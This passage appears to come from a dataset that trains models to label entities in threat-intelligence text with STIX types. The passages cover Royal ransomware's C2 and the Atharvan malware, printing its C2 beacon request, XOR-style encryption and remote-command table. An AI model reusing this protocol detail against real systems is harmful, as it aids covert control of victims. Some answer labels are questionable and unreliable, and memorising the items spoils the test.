"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nQakbot\n\n---\n\n### Text Passage:\n**Command and Control**\nOnce Royal actors gain access to a network, they communicate with command and control (C2) infrastructure and download multiple tools [T1105]. Legitimate Windows software is repurposed by Royal operators to strengthen their foothold within the victim\u2019s network. Ransomware operators often use open source projects to aid their intrusion activities\u2014Royal operators have recently been observed using `Chisel`, a tunneling tool transported over HTTP and secured via SSH [T1572], to communicate with their C2 infrastructure. FBI observed multiple Qakbot C2s used in Royal ransomware attacks but is yet to determine if Royal ransomware exclusively uses Qakbot C2s.\n",
"output": "MALWARE"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nT1105\n\n---\n\n### Text Passage:\n**Command and Control**\nOnce Royal actors gain access to a network, they communicate with command and control (C2) infrastructure and download multiple tools [T1105]. Legitimate Windows software is repurposed by Royal operators to strengthen their foothold within the victim\u2019s network. Ransomware operators often use open source projects to aid their intrusion activities\u2014Royal operators have recently been observed using `Chisel`, a tunneling tool transported over HTTP and secured via SSH [T1572], to communicate with their C2 infrastructure. FBI observed multiple Qakbot C2s used in Royal ransomware attacks but is yet to determine if Royal ransomware exclusively uses Qakbot C2s.\n",
"output": "ATTACK_PATTERN"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nT1572\n\n---\n\n### Text Passage:\n**Command and Control**\nOnce Royal actors gain access to a network, they communicate with command and control (C2) infrastructure and download multiple tools [T1105]. Legitimate Windows software is repurposed by Royal operators to strengthen their foothold within the victim\u2019s network. Ransomware operators often use open source projects to aid their intrusion activities\u2014Royal operators have recently been observed using `Chisel`, a tunneling tool transported over HTTP and secured via SSH [T1572], to communicate with their C2 infrastructure. FBI observed multiple Qakbot C2s used in Royal ransomware attacks but is yet to determine if Royal ransomware exclusively uses Qakbot C2s.\n",
"output": "ATTACK_PATTERN"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nWindows\n\n---\n\n### Text Passage:\nAtharvan\nAtharvan is so-named because when the malware is run, it creates a mutex named: \"SAPTARISHI-ATHARVAN-101\" to ensure that only one copy is running.\nIt will then contact a hardcoded C&C server. The hardcoded C&C addresses seen in one of the samples analyzed to date was for Amazon AWS South Korea (Seoul) region, which is not a common location for C&C infrastructure.\nThe C&C communications are formatted as HTTP POST requests where the Host header is hardcoded as \"update.microsoft.com\", e.g.:\n_POST /update.php HTTP/1.1_\n_User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52_\n_Host: update.microsoft.com_\n_Content-type: application/x-www-form-urlencoded_\n_Content-length: 46_\n_id=Atharvan &code=101&cid=H[REDACTED]&time=5_\nThe request body includes the following parameters:\n* \"id\": hardcoded string \"Atharvan\"\n* \"code\": represents request purpose, which can be one of:\n* 101: fetches commands\n* 102: sends command outputs or error messages\n* 103: fetches file body to write when processing command 0x12\n* \"cid\": hardcoded string \"H\" followed by the network interface hardware address of the affected computer as 12 hexadecimal digits\n* \"time\": interval between communication attempts\n* \"msg\" (optional): depending on the request purpose as specified using \"code\" parameter:\n* when the \"code\" parameter is 102, it includes output of commands or error messages in encrypted form\n* when the \"code\" parameter is 103, it identifies the file to fetch in non-encrypted form\nWhen encrypting the \"msg\" value, the malware uses the following encryption algorithm:\ndef encrypt(plaintext):\n_return bytes([((2 - byte) & 0xff) for byte in plaintext])_\nThe malware uses its own simplistic HTTP parser to extract the body from the server response. The extracted body is decrypted using the following algorithm:\ndef decrypt(ciphertext):\n_return bytes([((2 - byte) & 0xff) for byte in ciphertext])_\nWhen fetching commands, the malware expects the decrypted body to contain a sequence of strings separated by the \"\\x1A\" character.\nThe first byte of each string specifies the command to execute and the remaining bytes are interpreted as command parameters.\nTable 1. Atharvan commandsCommand Description\n------\n0x11 Configures interval between communication attempts\n0x12 Downloads arbitrary file from specified control server\n0x15 Runs arbitrary executable and sends its output to the remote attacker\n0x16 Configures communication to use schedule type 0x16\n0x17 Configures communication to use schedule type 0x17\n0x18 Configures communication to use schedule type 0x18\nWhen configuring a communication schedule, the command parameters specify the times and days for the communication attempts. Several different times can be specified, with the hour and minute of the day encoded.\nThe days are interpreted as:\n* No restrictions (communication schedule type 0x16)\n* Bitmask specifying days of month (communication schedule type 0x17)\n* Bitmask specifying days of week (communication schedule type 0x18)\nThis scheduled communication configuration is another unusual feature of the malware and is not commonly seen in malware of this kind.\n",
"output": "INFRASTRUCTURE"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nC&C\n\n---\n\n### Text Passage:\nAtharvan\nAtharvan is so-named because when the malware is run, it creates a mutex named: \"SAPTARISHI-ATHARVAN-101\" to ensure that only one copy is running.\nIt will then contact a hardcoded C&C server. The hardcoded C&C addresses seen in one of the samples analyzed to date was for Amazon AWS South Korea (Seoul) region, which is not a common location for C&C infrastructure.\nThe C&C communications are formatted as HTTP POST requests where the Host header is hardcoded as \"update.microsoft.com\", e.g.:\n_POST /update.php HTTP/1.1_\n_User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52_\n_Host: update.microsoft.com_\n_Content-type: application/x-www-form-urlencoded_\n_Content-length: 46_\n_id=Atharvan &code=101&cid=H[REDACTED]&time=5_\nThe request body includes the following parameters:\n* \"id\": hardcoded string \"Atharvan\"\n* \"code\": represents request purpose, which can be one of:\n* 101: fetches commands\n* 102: sends command outputs or error messages\n* 103: fetches file body to write when processing command 0x12\n* \"cid\": hardcoded string \"H\" followed by the network interface hardware address of the affected computer as 12 hexadecimal digits\n* \"time\": interval between communication attempts\n* \"msg\" (optional): depending on the request purpose as specified using \"code\" parameter:\n* when the \"code\" parameter is 102, it includes output of commands or error messages in encrypted form\n* when the \"code\" parameter is 103, it identifies the file to fetch in non-encrypted form\nWhen encrypting the \"msg\" value, the malware uses the following encryption algorithm:\ndef encrypt(plaintext):\n_return bytes([((2 - byte) & 0xff) for byte in plaintext])_\nThe malware uses its own simplistic HTTP parser to extract the body from the server response. The extracted body is decrypted using the following algorithm:\ndef decrypt(ciphertext):\n_return bytes([((2 - byte) & 0xff) for byte in ciphertext])_\nWhen fetching commands, the malware expects the decrypted body to contain a sequence of strings separated by the \"\\x1A\" character.\nThe first byte of each string specifies the command to execute and the remaining bytes are interpreted as command parameters.\nTable 1. Atharvan commandsCommand Description\n------\n0x11 Configures interval between communication attempts\n0x12 Downloads arbitrary file from specified control server\n0x15 Runs arbitrary executable and sends its output to the remote attacker\n0x16 Configures communication to use schedule type 0x16\n0x17 Configures communication to use schedule type 0x17\n0x18 Configures communication to use schedule type 0x18\nWhen configuring a communication schedule, the command parameters specify the times and days for the communication attempts. Several different times can be specified, with the hour and minute of the day encoded.\nThe days are interpreted as:\n* No restrictions (communication schedule type 0x16)\n* Bitmask specifying days of month (communication schedule type 0x17)\n* Bitmask specifying days of week (communication schedule type 0x18)\nThis scheduled communication configuration is another unusual feature of the malware and is not commonly seen in malware of this kind.\n",
"output": "INFRASTRUCTURE"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nChrome\n\n---\n\n### Text Passage:\nAtharvan\nAtharvan is so-named because when the malware is run, it creates a mutex named: \"SAPTARISHI-ATHARVAN-101\" to ensure that only one copy is running.\nIt will then contact a hardcoded C&C server. The hardcoded C&C addresses seen in one of the samples analyzed to date was for Amazon AWS South Korea (Seoul) region, which is not a common location for C&C infrastructure.\nThe C&C communications are formatted as HTTP POST requests where the Host header is hardcoded as \"update.microsoft.com\", e.g.:\n_POST /update.php HTTP/1.1_\n_User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52_\n_Host: update.microsoft.com_\n_Content-type: application/x-www-form-urlencoded_\n_Content-length: 46_\n_id=Atharvan &code=101&cid=H[REDACTED]&time=5_\nThe request body includes the following parameters:\n* \"id\": hardcoded string \"Atharvan\"\n* \"code\": represents request purpose, which can be one of:\n* 101: fetches commands\n* 102: sends command outputs or error messages\n* 103: fetches file body to write when processing command 0x12\n* \"cid\": hardcoded string \"H\" followed by the network interface hardware address of the affected computer as 12 hexadecimal digits\n* \"time\": interval between communication attempts\n* \"msg\" (optional): depending on the request purpose as specified using \"code\" parameter:\n* when the \"code\" parameter is 102, it includes output of commands or error messages in encrypted form\n* when the \"code\" parameter is 103, it identifies the file to fetch in non-encrypted form\nWhen encrypting the \"msg\" value, the malware uses the following encryption algorithm:\ndef encrypt(plaintext):\n_return bytes([((2 - byte) & 0xff) for byte in plaintext])_\nThe malware uses its own simplistic HTTP parser to extract the body from the server response. The extracted body is decrypted using the following algorithm:\ndef decrypt(ciphertext):\n_return bytes([((2 - byte) & 0xff) for byte in ciphertext])_\nWhen fetching commands, the malware expects the decrypted body to contain a sequence of strings separated by the \"\\x1A\" character.\nThe first byte of each string specifies the command to execute and the remaining bytes are interpreted as command parameters.\nTable 1. Atharvan commandsCommand Description\n------\n0x11 Configures interval between communication attempts\n0x12 Downloads arbitrary file from specified control server\n0x15 Runs arbitrary executable and sends its output to the remote attacker\n0x16 Configures communication to use schedule type 0x16\n0x17 Configures communication to use schedule type 0x17\n0x18 Configures communication to use schedule type 0x18\nWhen configuring a communication schedule, the command parameters specify the times and days for the communication attempts. Several different times can be specified, with the hour and minute of the day encoded.\nThe days are interpreted as:\n* No restrictions (communication schedule type 0x16)\n* Bitmask specifying days of month (communication schedule type 0x17)\n* Bitmask specifying days of week (communication schedule type 0x18)\nThis scheduled communication configuration is another unusual feature of the malware and is not commonly seen in malware of this kind.\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nAtharvan\n\n---\n\n### Text Passage:\nAtharvan\nAtharvan is so-named because when the malware is run, it creates a mutex named: \"SAPTARISHI-ATHARVAN-101\" to ensure that only one copy is running.\nIt will then contact a hardcoded C&C server. The hardcoded C&C addresses seen in one of the samples analyzed to date was for Amazon AWS South Korea (Seoul) region, which is not a common location for C&C infrastructure.\nThe C&C communications are formatted as HTTP POST requests where the Host header is hardcoded as \"update.microsoft.com\", e.g.:\n_POST /update.php HTTP/1.1_\n_User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52_\n_Host: update.microsoft.com_\n_Content-type: application/x-www-form-urlencoded_\n_Content-length: 46_\n_id=Atharvan &code=101&cid=H[REDACTED]&time=5_\nThe request body includes the following parameters:\n* \"id\": hardcoded string \"Atharvan\"\n* \"code\": represents request purpose, which can be one of:\n* 101: fetches commands\n* 102: sends command outputs or error messages\n* 103: fetches file body to write when processing command 0x12\n* \"cid\": hardcoded string \"H\" followed by the network interface hardware address of the affected computer as 12 hexadecimal digits\n* \"time\": interval between communication attempts\n* \"msg\" (optional): depending on the request purpose as specified using \"code\" parameter:\n* when the \"code\" parameter is 102, it includes output of commands or error messages in encrypted form\n* when the \"code\" parameter is 103, it identifies the file to fetch in non-encrypted form\nWhen encrypting the \"msg\" value, the malware uses the following encryption algorithm:\ndef encrypt(plaintext):\n_return bytes([((2 - byte) & 0xff) for byte in plaintext])_\nThe malware uses its own simplistic HTTP parser to extract the body from the server response. The extracted body is decrypted using the following algorithm:\ndef decrypt(ciphertext):\n_return bytes([((2 - byte) & 0xff) for byte in ciphertext])_\nWhen fetching commands, the malware expects the decrypted body to contain a sequence of strings separated by the \"\\x1A\" character.\nThe first byte of each string specifies the command to execute and the remaining bytes are interpreted as command parameters.\nTable 1. Atharvan commandsCommand Description\n------\n0x11 Configures interval between communication attempts\n0x12 Downloads arbitrary file from specified control server\n0x15 Runs arbitrary executable and sends its output to the remote attacker\n0x16 Configures communication to use schedule type 0x16\n0x17 Configures communication to use schedule type 0x17\n0x18 Configures communication to use schedule type 0x18\nWhen configuring a communication schedule, the command parameters specify the times and days for the communication attempts. Several different times can be specified, with the hour and minute of the day encoded.\nThe days are interpreted as:\n* No restrictions (communication schedule type 0x16)\n* Bitmask specifying days of month (communication schedule type 0x17)\n* Bitmask specifying days of week (communication schedule type 0x18)\nThis scheduled communication configuration is another unusual feature of the malware and is not commonly seen in malware of this kind.\n",
"output": "MALWARE"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nWindows NT 10.0\n\n---\n\n### Text Passage:\nAtharvan\nAtharvan is so-named because when the malware is run, it creates a mutex named: \"SAPTARISHI-ATHARVAN-101\" to ensure that only one copy is running.\nIt will then contact a hardcoded C&C server. The hardcoded C&C addresses seen in one of the samples analyzed to date was for Amazon AWS South Korea (Seoul) region, which is not a common location for C&C infrastructure.\nThe C&C communications are formatted as HTTP POST requests where the Host header is hardcoded as \"update.microsoft.com\", e.g.:\n_POST /update.php HTTP/1.1_\n_User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52_\n_Host: update.microsoft.com_\n_Content-type: application/x-www-form-urlencoded_\n_Content-length: 46_\n_id=Atharvan &code=101&cid=H[REDACTED]&time=5_\nThe request body includes the following parameters:\n* \"id\": hardcoded string \"Atharvan\"\n* \"code\": represents request purpose, which can be one of:\n* 101: fetches commands\n* 102: sends command outputs or error messages\n* 103: fetches file body to write when processing command 0x12\n* \"cid\": hardcoded string \"H\" followed by the network interface hardware address of the affected computer as 12 hexadecimal digits\n* \"time\": interval between communication attempts\n* \"msg\" (optional): depending on the request purpose as specified using \"code\" parameter:\n* when the \"code\" parameter is 102, it includes output of commands or error messages in encrypted form\n* when the \"code\" parameter is 103, it identifies the file to fetch in non-encrypted form\nWhen encrypting the \"msg\" value, the malware uses the following encryption algorithm:\ndef encrypt(plaintext):\n_return bytes([((2 - byte) & 0xff) for byte in plaintext])_\nThe malware uses its own simplistic HTTP parser to extract the body from the server response. The extracted body is decrypted using the following algorithm:\ndef decrypt(ciphertext):\n_return bytes([((2 - byte) & 0xff) for byte in ciphertext])_\nWhen fetching commands, the malware expects the decrypted body to contain a sequence of strings separated by the \"\\x1A\" character.\nThe first byte of each string specifies the command to execute and the remaining bytes are interpreted as command parameters.\nTable 1. Atharvan commandsCommand Description\n------\n0x11 Configures interval between communication attempts\n0x12 Downloads arbitrary file from specified control server\n0x15 Runs arbitrary executable and sends its output to the remote attacker\n0x16 Configures communication to use schedule type 0x16\n0x17 Configures communication to use schedule type 0x17\n0x18 Configures communication to use schedule type 0x18\nWhen configuring a communication schedule, the command parameters specify the times and days for the communication attempts. Several different times can be specified, with the hour and minute of the day encoded.\nThe days are interpreted as:\n* No restrictions (communication schedule type 0x16)\n* Bitmask specifying days of month (communication schedule type 0x17)\n* Bitmask specifying days of week (communication schedule type 0x18)\nThis scheduled communication configuration is another unusual feature of the malware and is not commonly seen in malware of this kind.\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", 